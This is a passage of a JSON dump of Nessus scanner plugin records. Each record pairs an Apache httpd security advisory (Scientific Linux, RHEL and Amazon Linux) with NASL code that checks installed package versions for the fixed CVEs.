audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:14:30", "bulletinFamily": "scanner", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via a\nprevious update) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "modified": "2018-12-31T00:00:00", "published": "2012-08-01T00:00:00", "id": "SL_20120221_HTTPD_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61261", "title": "Scientific Linux Security Update : httpd on SL5.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61261);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/12/31 11:35:00\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via a\nprevious update) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1203&L=scientific-linux-errata&T=0&P=874\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?99d5fd4b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"httpd-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-debuginfo-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-devel-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-manual-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mod_ssl-2.2.3-63.sl5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:13:15", "bulletinFamily": "scanner", "description": "Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "modified": "2018-12-20T00:00:00", "published": "2012-02-22T00:00:00", "id": "REDHAT-RHSA-2012-0323.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=58085", "title": "RHEL 5 : httpd (RHSA-2012:0323)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0323. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58085);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/12/20 11:08:45\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"RHEL 5 : httpd (RHSA-2012:0323)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0053\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1392.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0323\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0323\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-debuginfo-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-devel-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-manual-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mod_ssl-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-63.el5_8.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:14:29", "bulletinFamily": "scanner", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released in a\nprevious update) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "modified": "2018-12-31T00:00:00", "published": "2012-08-01T00:00:00", "id": "SL_20120213_HTTPD_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61245", "title": "Scientific Linux Security Update : httpd on SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61245);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/12/31 11:35:00\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released in a\nprevious update) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1202&L=scientific-linux-errata&T=0&P=2220\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5ddbd264\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-debuginfo-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-devel-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-manual-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:17:09", "bulletinFamily": "scanner", "description": "It was discovered that the fix for CVE-2011-3368 did not completely\naddress the problem. An attacker could bypass the fix and make a\nreverse proxy connect to an arbitrary server not directly accessible\nto the attacker by sending an HTTP version 0.9 request, or by using a\nspecially crafted URI. (CVE-2011-3639 , CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)", "modified": "2018-04-18T00:00:00", "published": "2013-09-04T00:00:00", "id": "ALA_ALAS-2012-46.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=69653", "title": "Amazon Linux AMI : httpd (ALAS-2012-46)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-46.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69653);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_xref(name:\"ALAS\", value:\"2012-46\");\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2012-46)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the fix for CVE-2011-3368 did not completely\naddress the problem. An attacker could bypass the fix and make a\nreverse proxy connect to an arbitrary server not directly accessible\nto the attacker by sending an HTTP version 0.9 request, or by using a\nspecially crafted URI. (CVE-2011-3639 , CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-46.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif 